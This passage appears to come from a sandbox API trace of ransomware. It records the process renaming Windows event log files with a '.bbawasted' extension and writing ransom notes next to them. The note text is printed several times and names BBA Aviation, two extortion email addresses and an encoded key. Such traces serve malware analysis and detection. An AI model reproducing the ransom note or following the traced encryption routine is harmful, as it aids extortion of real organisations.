szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6130) returned 1 [0197.314] CryptGenRandom (in: hProv=0x6a6130, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0197.314] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0197.314] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0197.315] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0197.317] SetEndOfFile (hFile=0x28c) returned 1 [0197.317] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.317] lstrcpyW (in: lpString1=0x6aed5a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0197.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.bbawasted")) returned 1 [0197.360] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0197.379] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0197.380] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0197.380] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0197.380] CloseHandle (hObject=0x280) returned 1 [0197.388] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0197.388] CloseHandle (hObject=0x294) returned 1 [0197.388] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0197.388] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6570) returned 1 [0197.389] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0197.389] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0197.389] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0197.390] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0197.390] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0197.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0197.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0197.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.402] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]dL8MQT+kQ9062JQpZ0Mu0mqq7ZHGa7KLWrjVMuLY7gPNX/DOd6UfYKTVRSRBzJwr\r\nVne5u4He2CfXSo2lD3j46kqls6N3MwjfgVJTa8LhmcSSxWqmAZuvPucVpnVJU39Z\r\nJpsPOSw3sM6V/tg1mPr+nIiURFD4DovqE1/N+pxDFai++GxDtyseFD2cOBRLyl8S\r\nNK5NZAHIQb/SL91qp5qcn8dPxU7WtNsvwB/IgTXouL6MDt5l1RvbzxngKx4XkISD\r\n51Bm6oOSWeHNh10B+C+614u83irH5GMf0SP+VQFXuwr0rSF8tNjr5wTnHdXmDsU6\r\nqkuzzLbkoEd+s2WS3buGYWbFCKtu7hhzCICmOx1ay05EAyHptlRYqSdG34j++H6+\r\nbYciC1tO77uapkwsbHmZSuICEzgs3lIrcg0CKcBovm1NHt0Pe/wxp6sk317GYXBF\r\nwxjYvStlJcfDpUD7VDocy/JinjvUalKzXk1mQUQBPXBSvV9RYOJhFp4qI90+2Tc7\r\nsaU4/j7FwMjdTE2dbvxINKl8CVwVW7dku5J/UGpPjvh5lb3UJebjd4p6OXs/gRRg\r\n8oRITeOmXEsDyNAhM3Cnk2KQEuqjiQmElc9zLE1WgONJLdwzchrlqWGIc+eIDFPZ\r\nO/TR9Fwz8YQCllYC3HWRv3X9zsFwhhN/9o2eHKhZq1V=[end_key]\r\nKEEP IT\r\n") returned 984 [0197.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0197.402] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0197.402] SetEndOfFile (hFile=0x28c) returned 1 [0197.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.405] CloseHandle (hObject=0x28c) returned 1 [0197.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0197.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f770 | out: hHeap=0x660000) returned 1 [0197.433] _aulldvrm () returned 0x0 [0197.433] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6bd0) returned 1 [0197.433] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0197.433] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0197.434] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 61 [0197.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x6aecf0 [0197.434] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0197.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.434] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6928) returned 1 [0197.465] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0197.465] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0197.465] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0197.466] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0197.467] SetEndOfFile (hFile=0x28c) returned 1 [0197.468] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.468] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0197.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.bbawasted")) returned 1 [0197.469] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0197.469] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0197.469] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0197.469] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0197.470] CloseHandle (hObject=0x294) returned 1 [0197.490] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0197.491] CloseHandle (hObject=0x280) returned 1 [0197.491] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0197.491] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a61b8) returned 1 [0197.492] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0197.492] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0197.492] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6020) returned 1 [0197.493] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0197.493] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0197.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0197.552] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0197.552] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.552] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]aWl8x4f183jz6GixvVso4X4k67myEvvrUhV4sTpluh2JzWRAK2olLUb6/yoGMDXP\r\nmyrLet9v7Fyu2fQ34SFZa5FmEOlwPHAXV4DdhZAtRgfcr8sa0Gffb7ncvbwWfDpJ\r\nXTkFvt2AqqJf6NXMIaeWviCf8QZA8jiAJeekkP5FcXreiI7MF+vi8RB/EIn4x2HD\r\nwbO2x/XHta5KrGp9C130Nv9g9ng1HKBzXkc4r9ofvT7liFS4DEuKpVdQfeS4Ep8q\r\n54q64UEGVYQDPwtJ7arZ+4Yy69HbeGtME4/6nEngMnhn5WqhWcBeFjtFY1mUriUe\r\n/QNn3WrWYc3Ta4TN/rxOLkDgWcCCo1NrEnAyU1e6OYJewiHfV7hpDmE0b4i0V4To\r\nUcLkYHC6UIBLWyave1FXOLs5SmqFIFUAFTWmhH64mpZOB3vY/b0EhAaN+tNnfY0l\r\nWpR4B+ThPYDY9z8ZvxLnwo0Dr/sRAkgt+e4RjmGFhL6AD8qXYcZ8eUBQ92zuM5Zw\r\nPX2n2364iSEYUoOXIeKK33ruhsghwLOQ1neeRu8b/QK2jiOPk3OowF9cnv/4AuN9\r\nIGw3PjlCDl3z8Q+cR9yTNWlqCqzxUQK+pE835jxQaz49HTJxEs+gfWLVrwd/5kDn\r\njIwU2FVb6LI6hb+FYmycD8bCVZcX9SdhhEaQicdC8aV=[end_key]\r\nKEEP IT\r\n") returned 984 [0197.552] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0197.552] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0197.552] SetEndOfFile (hFile=0x28c) returned 1 [0197.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.555] CloseHandle (hObject=0x28c) returned 1 [0197.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0197.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7d50 | out: hHeap=0x660000) returned 1 [0197.560] _aulldvrm () returned 0x0 [0197.561] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6708) returned 1 [0197.561] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0197.561] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0197.561] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 78 [0197.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a6) returned 0x6aecf0 [0197.562] lstrcpyW (in: lpString1=0x6aed8c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0197.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.562] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6460) returned 1 [0197.562] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0197.563] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0197.563] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0197.563] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0197.565] SetEndOfFile (hFile=0x28c) returned 1 [0197.565] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.565] lstrcpyW (in: lpString1=0x6aed8c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0197.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.bbawasted")) returned 1 [0197.566] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0197.566] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0197.568] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0197.568] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0197.568] CloseHandle (hObject=0x280) returned 1 [0197.578] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0197.578] CloseHandle (hObject=0x294) returned 1 [0197.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0197.579] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f98) returned 1 [0197.579] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0197.579] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0197.579] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0197.580] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0197.580] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0197.591] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0197.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0197.591] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.591] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Vz4AsEZ6HwaSMUJYo2uKdrmNv63X/xUq84CO02trJPTIG8/SC0wyHifrBuBiDV4T\r\nM7mtChSYI/BsCDZsUTEto1QJGdpdtt1Px+OAWR5DowvNKtowc7V80oyxxpFwHZ/h\r\ngyutT0Q4gAUn9nAzwdb/zmIrzWFAJBofpz9EsQDa3lEQ50gXvCBwtDZATAXuCTzV\r\nOEsiExPL+yeln3DspC8JNTyRIOvQ6eUbXWPvDijPR6593fa9rQ3O4WdssSalFy3T\r\nLRfpAHu0nw1hFZR9uQ5SI21KGf1nn4Ing4dDXYuyeXwmJPxBZVp9/wE7kal7ii3/\r\np6IIPUs6uNcVA0z23wleiF/4G9rFYJZ2WIlnomx/2kOkjPpD1dZJex/a1B2ACB4w\r\n4wyyygt/+qFHPNhzIRAKbrW0q+gclZDltbjk0RW/D+hi1vQGRvRU4TAobF0rfzhA\r\nlPZpkZ5oyOTBDvb56Mp6S3G2JtoItNoAOOF5ITiS4SWRqAWZXLZ6HiAQnAR5X9uC\r\nHDGpY1xRMYci8NHv+E0qkPHezA3wj/V0TpxtQzRXkKNtNpKkhnKVPU62BDRnCRd+\r\ndb6guXH+TPatqZQ7pebkHHFZmENSMN78B0E0594dTBIFmBHjDtJrduOUfykGoP6N\r\n1BxGF9i8vrLszEdHeEkXMbhXtncK5DciFu+MRQv4riT=[end_key]\r\nKEEP IT\r\n") returned 984 [0197.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0197.591] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0197.592] SetEndOfFile (hFile=0x28c) returned 1 [0197.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.595] CloseHandle (hObject=0x28c) returned 1 [0197.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0197.681] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f838 | out: hHeap=0x660000) returned 1 [0197.681] _aulldvrm () returned 0x0 [0197.681] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6818) returned 1 [0197.682] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0197.682] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0197.682] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 84 [0197.682] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2b2) returned 0x6aecf0 [0197.682] lstrcpyW (in: lpString1=0x6aed98, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0197.682] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.682] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6c58) returned 1 [0197.683] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0197.683] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0197.683] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0197.684] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0197.685] SetEndOfFile (hFile=0x28c) returned 1 [0197.686] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.686] lstrcpyW (in: lpString1=0x6aed98, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0197.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.bbawasted")) returned 1 [0197.687] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0197.687] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0197.687] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0197.687] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0197.688] CloseHandle (hObject=0x294) returned 1 [0197.698] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 